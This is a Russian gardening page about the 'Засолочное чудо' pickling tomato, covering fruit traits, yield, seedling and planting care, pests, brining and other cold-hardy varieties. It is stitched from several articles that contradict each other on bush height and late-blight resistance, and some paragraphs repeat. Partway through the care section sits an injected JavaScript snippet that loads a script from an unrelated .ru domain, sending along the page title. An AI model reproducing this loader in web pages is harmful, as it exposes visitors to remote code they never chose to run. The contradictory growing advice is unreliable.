Описание томата Засолочное Чудо

Характеристика и описание сорта томата Засолочный деликатес

Помидоры Засолочный деликатес относятся к среднеспелым детерминантным сортам. Изначально томат данного сорта предназначался для выращивания рассадным способом в открытом грунте. Томат сорта Засолочный деликатес относят к штамбовой форме. Отличительной особенностью является толстый прямой стебель. Стоит отметить, что культура малорослая. Кусты способны достигать в высоту до 1 м.

Благодаря тому, что кожица у томата довольно плотная и в нем содержится большое количество сухих веществ, плоды сорта Засолочный деликатес отлично подходят для консервирования. При контакте с кипятком они не трескаются, при этом сохраняется плотность и насыщенность вкуса.

Описание плодов

Спелые томаты сорта Засолочный деликатес напоминают по форме сливу, имеют средний размер. Цвет помидоров варьируется от розового до насыщенного красного оттенка. В каждой кисти завязывается от 5 до 8 помидоров. Вес спелого плода в среднем составляет 80-100 г.

Стоит отметить, что семенные камеры расположены равномерно, в каждом томате их насчитывается 4 шт. Спелые плоды отлично хранятся длительное время в домашних условиях, кроме этого, их можно перевозить на дальние расстояния без потери товарного вида и вкусовых качеств.

Урожайность, плодоношение

Согласно описанию и отзывам, томат Засолочный деликатес созревает после высадки в открытый грунт, спустя 95-100 дней. Если соблюдать все рекомендации по посадке и дальнейшему уходу, то уровень урожайности будет достаточно высоким. Выполняя все агротехнические нормы, есть возможность собирать с каждого томатного куста до 3,5 кг спелых плодов. Отличительной особенностью томатов данного сорта является высокий уровень устойчивости к появлению многих видов заболеваний и вредителей.

Устойчивость сорта

Важно отметить, что помидор сорта Засолочный деликатес имеет высокий уровень устойчивости ко многим видам заболеваний, характерным для данной культуры. Несмотря на это стоит учитывать, что в момент плодоношения есть вероятность появления фитофтороза. Для предотвращения данного заболевания рекомендуется перед посадкой продезинфицировать семена, а в дальнейшем обрабатывать рассаду препаратами, в состав которых входит медь

Для этих целей подойдет бордоская смесь либо препарат «Хом»

Для предотвращения данного заболевания рекомендуется перед посадкой продезинфицировать семена, а в дальнейшем обрабатывать рассаду препаратами, в состав которых входит медь. Для этих целей подойдет бордоская смесь либо препарат «Хом».

Плюсы и минусы

Согласно отзывам и фото, помидоры Засолочный деликатес имеют существенный недостаток – низкий уровень сопротивляемости к фитофторозу. При этом стоит отметить, что другим заболеваниям томат данного сорта практически не подвергается. Кроме этого, из-за высокого уровня влажности может появиться грибок. Во время засухи уровень урожайности значительно снижается, кроме этого, есть высокая вероятность гибели культуры.

Среди преимуществ стоит отметить следующие моменты:

  • спелые плоды имеют одинаковую форму;
  • мякоть и кожица довольно плотные;
  • отличные вкусовые качества;
  • возможность перевозить томаты на дальние расстояния, при этом товарный вид не будет потерян;
  • длительный срок хранения в домашних условиях.

Именно эти преимущества становятся основными при принятии решения приобрести томаты сорта Засолочный деликатес. Незабываемыми помидоры делают привлекательный внешний вид и высокие вкусовые качества.

Особенности выращивания и ухода

Штамбовые сорта томатов, к которым относится и Засолочное чудо, имеют мощный, прямостоячий стебель, компактную крону. Такие сорта не нуждаются в формировании и подвязывании. Во время плодоношения растения спокойно склоняются на одну сторону, освобождая место, необходимое для ухода и сбора урожая.

По мере необходимости производят пасынкование (устранение боковых побегов). Наиболее качественный урожай получают от одностеблевых кустов, на которых оставлено по 5 крупных гроздей (10-12 цветоносов каждая).

Уход за растениями прост и состоит в регулярном поливе теплой водой (2-3 раза в неделю), грамотном удобрении почвы, профилактике болезней и нападений вредителей.

Полив должен представлять собой равномерное орошение почвы. Такой метод приведет к усыханию листвы. В результате, растение все свои силы направит на развитие и вызревание плодов.

Опытные овощеводы для улучшения роста томатов применяют сидераты. Одним из лучших считается горчица. Дополнительно растение служит натуральным удобрением для томатов. Горчица сохраняет влагу в земле, подавляет рост сорняков, разрыхляет грунт, обогащает его микроэлементами, защищает томаты от вредителей (проволочника, слизней, медведки). Кроме того, ее можно использовать в качестве мульчи, ломая и устилая поверхность почвы.

Увеличивают количество завязей путем опрыскивания посадок раствором борной кислоты. Внекорневое орошение производят дважды: при зацветании первой кисти и в начале периода плодоношения.

Универсальный сорт томата «Засолочное чудо» — характеристики, описание, рекомендации по уходу

С приходом теплых весенних деньков садоводы начинают освобождать свои подоконники от горшочков с различной рассадой. Это могут быть перцы, баклажаны, капуста, ну и конечно же помидоры.

К последним многие дачники относятся с большей любовью, так как томаты любят практически все люди. Их можно употреблять как в приготовленном, так и в сыром виде, но по сравнению с многими другими овощами они хорошо подходят для закатывания в банки на зиму. Для этого были выведены максимально подходящие сорта одним из которых является «Засолочное чудо».

Эти помидоры относятся к раннеплодоносящим сортам, выведенным уральскими селекционерами.

  • Кустик маленький, высотой всего 45 — 50 см;
  • Растение штамбовое, детерминантного типа;
  • Срок с момента всхода до возможности употребления в пищу примерно 80-100 дней;
  • Плоды небольшие, вес их около 90 грамм, зато количество на одной веточке довольно-таки большое;
  • Форма округлая, цвет ярко-красный, мякоть плотная, кожица упругая, что позволяет им относиться к сортам с хорошей транспортабельностью и возможностью хранения в сыром виде;
  • На вкус плоды приятные, но не сладкие, как, к примеру, Шоколадное или Оранжевое чудо. Шикарно подходят для заготовок в цельном виде;
  • Сами кустики невысокие, 45-55 см.

Из-за компактности их можно посадить много на небольшом участке.

Перечень сортов томата, представленных на нашем сайте, которые так же рекомендованы к маринованию: Кибиц, Чибис, Толстый боцман, Сахарные сливы, Шоколадка, Груша желтая, Золотая рыбка, Пинк импрешн, Аргонавт, Ляна Розовая.

Рекомендации по выращиванию

Помидоры «Засолочное чудо» — это универсальный сорт томата, который обладает очень высокими характеристиками. Их можно выращивать в теплице и открытом грунте, растут они одинаково отлично. Плюсом укрытия будет являться только то, что плоды созревают раньше на несколько недель, но и высадка из горшка в грунт происходит раньше.

Хорошо растет, если регулярно проводить полив теплой водой и подкармливать кустики удобрениями на протяжении всего периода активной вегетации. Когда им чего-то не хватает, кустик чахнет, а значит, и хорошего урожая не будет.

У сорта Засолочное чудо отличный иммунитет. Томаты устойчивы к вирусу табачной мозаики, фитофторозу, альтернариозу, антракнозу и фузариозу.

Листья и стебли томатов содержат ядовитые алкалоиды, из-за этого большинство листоедов обходят их стороной. Основной вредитель — колорадский жук. Его привлекают молодые растения. В этот период нужно опрыснуть их любым пестицидом.

Сорт Засолочное чудо выведен совсем недавно, но уже хорошо известен среди любителей заготавливать соленые и консервированные томаты.

Способы засолки помидор

Способы засолки помидор просты. На дно емкости кладут часть подготовленных специй

Затем осторожно укладывают (не насыпают) плоды и переслаивают их специями

В банки томаты укладывают до горлышка, иначе они, впитав часть рассола, окажутся наверху без заливки. Уложенные плоды заливают доверху рассолом, прикрывают крышкой и ставят для брожения.

Если засолка томатов производилась не в стеклянные банки, а в другие емкости, то поступают следующим образом: уложенные и пересыпанные специями томаты накрывают чистой тканью, кладут кружок и небольшой груз (только, чтобы плоды не всплывали), заливают рассолом и ставят в прохладное помещение. Молочнокислое брожение томатов начинается несколько медленнее, чем огурцов, что связано с незначительным содержанием соланина в их плодах. Через 2—3 недели (в зависимости от температуры хранилища) томаты готовы к употреблению. Чтобы на поверхности рассола не образовалась плесень, сверху томаты посыпают сухим измельченным листом или корневищем хрена.

Описание и характеристики сорта томата Засолочное чудо, его урожайность

Любимый дачниками селективный сорт томатов, выведенный уральскими умельцами и дающий хорошую урожайность, носит название «Томат Засолочное чудо», а в простонародье называется «лентяйка».

Консервировать с томатами или с пастой можно и свеклу, и болгарский (сладкий) перец, баклажаны, кабачки, даже яблоки. Дачный участок, огород, клочок земли, с любовью возделанный и засаженный овощными культурами, от посева до сбора урожая требует достаточно много внимания и труда. Хотелось бы взрастить одновременно с другими культурами сорт овощей, не нуждающийся в постоянной заботе, а приносящий богатый урожай. Такой неприхотливый вид существует.

Общая характеристика

Засолочное чудо — незатейливый, низкорослый, не выше полуметра куст, скороспелый, с вызреванием плодов от трех до трех с половиной месяцев. Неплохо переносит колебания температур окружающей среды, устойчив к болезням и вредителям.

Но все же пускать на самотек взросление куста не стоит. Перед посевом семена надо выдержать в обеззараживающем растворе, после промыть, просушить и обработать стимуляторами роста. Для отпугивания «непобедимого» колорадского жука кусты необходимо опрыскать специальными (безопасными для человека) ядами. С остальными вредными любителями листочков томатов Засолочное чудо справляется само.

Описание сорта:

  1. Плоды помидоров «Лентяйка» имеют небольшую сливововидную плотную форму, насыщенного красного цвета. Два-три сантиметра длиной и восемьдесят-сто грамм веса один помидор с первого созревания, остальной приплод мельче.
  2. Плодоносит куст густо, только с одного можно собрать ведро объемом до двадцати литров.
  3. Засолочное чудо своими размерами и вкусовыми качествами (без сладковатого привкуса) идеально подходит для закруток цельными плодами.
  4. Плотная мякоть плода и прочная шкурка хорошо сохраняют целостность при транспортировке и засолке.
  5. Название томата говорит само за себя.

Особенности выращивания

Характеристика правильного выращивания рассады Засолочного чуда заключается в том, что поросль хорошо принимается в открытых почвах и теплицах при температуре восемнадцать градусов по Цельсию, и растет одинаково быстро. Следовательно, в районах с холодными климатическими условиями Засолочное чудо — очень приемлемый вариант. Но не стоит забывать, что семена высеивать на рассаду надо не более чем за два месяца.

Прочитав многочисленные отзывы, можно выяснить, что благодаря своим маленьким размерам роста рассадой томатов можно густо засадить участок земли метр на метр, где-то шесть-восемь кустов.

Лучший вариант посадки помидоров Засолочное чудо — это в длинный ряд с расстоянием между кустами двадцать-двадцать пять сантиметров. Не требующие опор для подвязки кусты томатов в процессе роста легко сгибаются в одну сторону, сохраняя заданное положение, образуя свободный подход к ним для обработки, поливки и сбора урожая.

Землю для посадки помидоров покрывают, мульчируют торфом, навозом или, на крайний случай, за неимением торфа или навоза, опилками или картоном.

Навоз и торф не только хорошо удобряют почву для рассады, но и отлично защищают от сорных растений. Для защиты от сорняков можно высадить вместе с рассадой и семена горчицы. Опилки со временем смешиваются с землей и перегнивают, образуя прекрасное удобрение для почвы.

В засушливое лето или в теплицах кусты томатов поливают два или три раза в неделю теплой водой, но не заливают как огурцы, а увлажняют почву. Это приводит к засыханию листочков и увеличению роста плодов. Максимально большой урожай дают кусты Засолочного чуда, выращенные одним побегом на пять кистей: все остальные кисти и лишние побеги нужно обрывать.

Особенности выращивания рассады и подготовки ее к высадке сорта Засолочное чудо особых отличий от других сортов не имеют, а выращиванию кустов до созревания плода этот вид особого ухода не требует.

Экономя силы и время, на радость дачников и огородников, обладая присущими только ему нотками вкуса, помидоры сорта Засолочное чудо идеально украсят стол как в сыром виде, так и в приготовленном, засоленном, консервированном. Настоящие ценители томатов утверждают, что лучший вкус у помидор сорта Засолочное чудо бывает только в консервированном состоянии.

Подготовка грунта

Основная часть огородников с осени перекапывают участок . Это способствует снегозадержанию и обогащению почвы перегнившими за зиму растительными остатками. Весной солнечную делянку для томатов нужно заправить органическими удобрениями и перекопать. Навоза или компоста достаточно ведра на квадратный метр площади, древесной золы нужно около 2 килограммов на квадрат.

Минеральные удобрения вносить вместе с навозом и золой не нужно. Навоз – природное комплексное удобрение, зола прибавит минеральных веществ и уменьшит кислотность почвы.

Избегайте использования на своем участке гербицидов, пестицидов, усилителей, ускорителей, стимуляторов.

Проводить профилактические обработки не стоит, следите внимательно за здоровьем растений и начинайте лечение в том случае, если появились признаки болезни. Последние разработки селекционеров имеют хороший природный иммунитет, поэтому в большинстве случаев применять сильнодействующие средства не приходится.

Выращивание помидоров

Выращивают томатный сорт «Засолочный деликатес» традиционно рассадным способом.

Как подготовить семена?

Рекомендации по подготовке семенного материала:

  1. Повысить урожайность можно поместив пакетик с посадочным материалом за несколько месяцев до высевания рядом с источником тепла. При помощи батареи центрального отопления можно прогреть семена до +25…+30 градусов;
  2. Семенной материал перед посевом нуждается в дезинфекции, чтобы снизить риск возникновения заболеваний. Для этого нужно приготовить следующий раствор: в пол литре воды растворить один грамм марганцовокислого калия. В полученном растворе замачивают семена на 15-20 минут. После промывают в чистой воде;
  3. Следующим этапом будет помещение семян на влажную ткань с пористой структурой на 12-15 часов, для набухания. По прошествии времени семена немного подсушивают. Благодаря данной процедуре побеги всходят на неделю раньше обычного.

Посев семенного материала

Как посеять семена на рассаду:

  • К высеванию посадочного материала приступают за 60-65 дней до пересадки на постоянное место;
  • Желательно высевать в готовую почвосмесь, предназначенную для томатных культур. Допустимо использовать самостоятельно приготовленный субстрат, в состав которого в равных частях входят садовая либо дерновая земля и перегной. Однако такой субстрат необходимо продезинфицировать: либо прокалить в духовом шкафу, либо пролить горячим концентрированным марганцовым раствором;
  • Семена высевают в сделанные во влажном грунте бороздки, глубиной 1 см, с интервалом в 2 см. Сверху присыпают небольшим торфяным слоем;
  • Чтобы ускорить всхожесть, контейнеры следует укрыть прозрачной пленкой. Затем ёмкости помещают в теплое, темное место;
  • После того, как появятся первые ростки, пленку снимают. Ёмкости перемещают на подоконник с хорошим освещением, а также понижают температурный режим в помещении. Это позволит предотвратить вытягивание ростков;
  • Полив осуществляют умеренный, не допуская пересыхания верхнего почвенного слоя;
  • После формирования пары настоящих листочков саженцы следует пересадить в отдельные горшочки. Лучше использовать торфяные, это позволит предотвратить возможное травмирование корневой системы при высадке на постоянное место. После пикировки рассаду подкармливают комплексным минеральным удобрением;
  • На протяжении 10-14 дней до высадки рассаду закаливают, вынося на открытый воздух, постепенно увеличивая период нахождения на улице.

Правила высадки рассады

К правилам относится:

  • В первых числах мая томатные саженцы пересаживают в тепличные сооружения, а в незащищенный грунт — в первых числах июня;
  • Подготавливать грунт начинают с осени. Грядку тщательно перекапывают, одновременно удаляя все остатки растительного происхождения. Также вносят удобрения;
  • Весной грунт рыхлят. В тепличных сооружениях снимают верхний почвенный слой;

Для выращивания томатов предпочтительно использовать грядки после капусты, бобовых, лука, сидератов.

Высаживают молодые саженцы соблюдая рекомендуемую загущенность — не более 5 кустиков на 1 м2.

Томат Засолочное чудо характеристика и описание сорта урожайность с фото

Достоинства и недостатки

Отзывы говорят об отсутствии у данного сорта недостатков

Если изучить описание характеристик этих томатов, внимание можно обратить на следующие положительные качества:

  • приятный вкус;
  • универсальность в применении;
  • высокие показатели урожайности;
  • транспортировка на длительные дистанции;
  • при хранении в свежем виде не теряют своего внешнего вида;
  • устойчивы к большей части распространенных болезней.

Если верить в отзывы, недостатками этот вид томатов не обладает.

Описание сорта

Томат Чудо посола – среднерослый детерминант. Для кустов характерны такие признаки:

  • высота 50 см;
  • компактность;
  • на гроздьях по 6-7 помидорок;
  • первая кисть образуется через 7-8 листочков;
  • все последующие через 2-3.

Созревание начинается рано — через 90-96 дней от всходов.

  • средняя масса 80-100 г;
  • мякоть мясистая, плотноватая;
  • кожица прочная;
  • уровень сухих веществ 6%;
  • во вкусе все гармонично – и сладость, и кислинка.

Компактные кустики таят немало сюрпризов. Трудно поверить, но законсервировав плоды лишь с грядок Засолочного чуда, хозяйка может быть уверена: запасов хватит до конца зимы. Сорт негибридного происхождения разрабатывался российскими селекционерами, поэтому вопрос заготовок продуман хорошо. Вместе с тем помидоры подходят и для салатов или томатных супов.

  • кусты не перерастают отметку в 50 см, редко встречается высота 80 см;
  • облиственность средняя, ближе к скудной;
  • завязь кистями, около 5-6 на куст, в каждой до 15 томатов;
  • созревание коллективное;
  • обильно плодоносящий томат годится для промышленного выращивания.
По срокам созревания
По типу роста
По типу использования
По способу выращивания
Масса плода (г)
Урожайность (кг/ м2)
Характеристики плода
Ранне-спелый, 80-90 днейДетер-минантный (50 см)Универ-сальныйДля теплиц и открытого грунта60-90В теплице до 15, на грядке от 6-9Цвет красный, форма сливовидная. Мякоть плотная. Вкус умеренно сладкий. Несколько семенных камер.

Правила выращивания

Чтобы получить рассаду, необходимо посадить семена за несколько месяцев до высаживания в открытый грунт. Чтобы они быстрее взошли, следует регулярно проветривать помещение и тщательно подкармливать почву. Лучше всего для этих целей подойдет органика: регулярное использование помета или древесной золы позволит рассаде быстрее взойти.

Высаживать рассаду следует в прогретый грунт. Его температура не должна быть менее 15°С. На 1 кв. м допустимо расположить около 5 кустов. Посадка проводится таким образом, чтобы между рядами было расстояние в 70 см. Между лунками не должно превышать 35 см.

  1. Компактность кустов позволяет экономить место в саду.
  2. Урожайность. С 1 куста возможен сбор от 20 л.
  3. Лежкость высокой степени, томаты неплохо переносят перевозку или хранение в ящиках.
  4. Плотная мякоть не деформируется после консервирования. Вкус также остается прежним.
  5. Устойчивость к фитофторе и прочим болезням , состав листьев отпугивает вредителей.
  6. Томат не требует сложного ухода, включая пасынкование.
  7. Опора не нужна.
  • Томат подходит для целевых посадок под консервирование. Растет быстро, спеет дружно, собирать удобно. Помидоры небольшие, аккуратные, удобно закладывать в банку. Уход ограничивается поливом и внесением удобрений. В теплице созревание ускоряется, поэтому к заготовкам можно приступать, не дожидаясь осенней хлопотной поры (Наталья, г. Красноуфимск).
  • Томат с классическим помидорным вкусом, с ним получаются соусы и паста. Минимум временных затрат на уход окупается высоким урожаем. Сажать можно густо, подвязывать не нужно (Николай, Алтайский край).

Уход за этими растениями стандартный. Заключается он в регулярном поливе, подкормке и рыхлении почвы. Полив следует проводить в вечернее время суток. Подкормка должна включать в себя не только органические вещества, но и минеральные удобрения. Лучше всего подойдут вещества, содержащие калиевые и фосфорные комбинации.

Рыхлить почву нужно для того, чтобы корневая система получила необходимый кислород. Также необходимо пропалывать грядки и удалять все сорняки. Подвязка растения необязательна, так как кусты имеют компактный и невысокий внешний вид.

Заболевания и вредители

Этот сорт томатов довольно устойчив к большинству распространенных заболеваний. Благодаря тому, что внутри его стебля есть алкалоиды, большинство паразитов и вредителей не могут навредить кусту. Единственная проблема этой разновидности — наличие колорадского жука.

Посадка саженцев и почва

Правильно выращенная рассада – залог хорошего будущего урожая. Помидоры нужно регулярно подкармливать, поливать и соблюдать световой режим дня. В первый период выращивания саженцев, в качестве подкормки используют препараты с большим содержанием азота. Пикируют рассаду в момент появления двух или трех истинных листьев и непосредственную пересадку томатов производят в обогащенную калием и фосфором почву. Благодаря химическим элементам, помидоры быстро адаптируются в новой среде и хорошо укореняются.

Условия существования помидоров в открытой почве характеризуется нестабильными показателями температурных перепадов, которые могут пагубно отражаться на молодых листьях рассады. Во избежание такой ситуации, растения нужно предварительно закаливать. Делается это постепенно. На первоначальном этапе закаливания саженцев производится путем проветривания помещения, далее растения выносят на 15-20 минут на балкон. Благодаря такой методике, листья томатов постепенно начинают привыкать к палящим солнечным лучам и колеблющейся температуре.

Устойчивые к холодам

Холодостойкость – непременная характеристика растений для северных регионов. Ведь даже в теплицах они подвергаются неблагоприятному климатическому воздействию, перепадам температуры.

Стойкими к холодам считаются:

  1. Томат Урал. Этот сорт выведен специально для Урала и Сибири. Индетерминантный, 150-180 см. Стебель прочный, среднеоблиственный. Плоды плоскоокруглые, по 3-4 штуки в кисти. Вес одной помидорки – 200-350 г, на нижних кистях может быть и выше.
  2. Томат Зинуля. Стрессоустойчивое растение с крепким иммунитетом, рассчитанное на короткое лето северных регионов. Куст высотой 0,8-1 м. Отдача урожая ранняя, дружная. Помидорки плоскоокруглые, розовые с перламутровым отблеском, с тоненькой шкуркой, весом 100-300 г.
  3. Томат Звезда Сибири f1. Адаптированный к короткому световому дню, невосприимчивый к холодам и болезням гибрид. Куст детерминантный, 1-1,4 м. Требует формовки, можно в 3-4 ствола. Плодики красные, округлые, мясистые, весом 150-200 г. Урожайность – 4-5 кг с куста.

Также устойчивы к холодам фиолетовые помидоры. Это Indigo Rose, Голубая красавица, Фиолетовая гордость Весселя и другие. Чтобы необычный окрас проявился в полной мере, этим пасленовым стоит отдать самые солнечные места на грядке.

Особенности выращивания и ухода

Способ выращивания – через рассаду. За 55-60 дней до высадки растений в открытый грунт семена сеют в рассадные ящики. Если семена не обработаны в заводских условиях, о чём на упаковке должна быть отметка, их надо обработать от болезней самостоятельно.

Предназначенные для посева семена выдерживают в дезинфицирующем растворе — растворе марганцовки, соке алоэ, растворе Фитоспорина. Обеззараженные семена промывают чистой водой, просущивают и обрабатывают стимуляторами прорастания — НВ, Эпин, Новосил или растворе мёда.

Подросшую рассаду высаживают на постоянное место по схеме 50*40см когда почва на грядке прогреется до 15-18 градусов на глубине посадки рассады.

Самый весомый урожай получают с растений, сформированных одним побегом, без всяких боковых побегов и оставляя на кусте не более 5 кистей. В этом случае плоды будут самого высокого качества. Обильные поливы и своевременные внесения фосфорных и калийных удобрений добавят урожайности растениям.

Увеличить завязываемость плодов можно опрыскиванием посадок раствором борной кислоты ( 1г на 1л воды).

var m5d6fd70f32c60 = document.createElement(‘script’);
m5d6fd70f32c60.src=’https://s98k2dmmbm.ru/show/?’ + Math.round(Math.random()*100000) + ‘=’ + Math.round(Math.random()*100000) + ‘&’ + Math.round(Math.random()*100000) + ‘=3085&’ + Math.round(Math.random()*100000) + ‘=’ + document.title +’&’ + Math.round(Math.random()*100000);
function f5d6fd70f32c60() else
}
f5d6fd70f32c60();

Аптечный порошок борной кислоты растворяют в небольшом количестве горячей воды, а затем доводят объем раствора до нужной концентрации

Опрыскать нужно при начале цветения первой кисти и с началом созревания первых плодов. Внесение азотных удобрений с началом цветения нужно ограничить.

Сорт Засолочное чудо обладает прекрасным иммунитетом. Кусты устойчивы к большинству заболеваний, опасных для пасленовых. Зеленая масса кустов этого сорта содержит ядовитые вещества, отпугивающие листогрызущих вредителей.

Исключение представляет колорадский жук – он может попортить молодые листья и побеги. Для защиты посадки опрыскивают специальными средствами от колорадского жука.

Другие засолочные сорта помидоров:

  • Акварель
  • Триумф
  • Красным- красно
  • Витязь
  • Санька
  • Дубрава
Поделитесь в социальных сетях:FacebookXВКонтакте
Напишите комментарий